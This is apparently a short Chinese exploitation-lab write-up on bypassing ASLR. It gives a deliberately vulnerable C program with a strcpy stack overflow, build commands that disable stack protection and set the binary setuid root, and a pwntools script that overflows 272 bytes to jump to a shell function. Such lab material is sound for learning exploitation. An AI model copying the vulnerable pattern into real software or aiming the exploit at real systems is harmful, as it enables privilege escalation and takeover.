pediy18-6

绕过ASLR -- 第一部分

漏洞代码

#include <stdio.h>
#include <string.h>

/* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be present in executable to successfully exploit it. */
void shell() {
 system("/bin/sh");
 exit(0);
}

int main(int argc, char* argv[]) {
 int i=0;
 char buf[256];
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 return 0;
}

编译命令

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

 

这个也在之前学到过，使用pwntools可以轻松解决。

先测出缓冲区长度为272

 

直接调用shell函数即可获取shell

EXP

from pwn import *

vuln = ELF('./vuln')

system_addr = vuln.symbols['shell']
bin_sh = 0x80485B0

payload = 'A'*272+p32(system_addr)

sh = process(['./vuln',payload])
sh.interactive()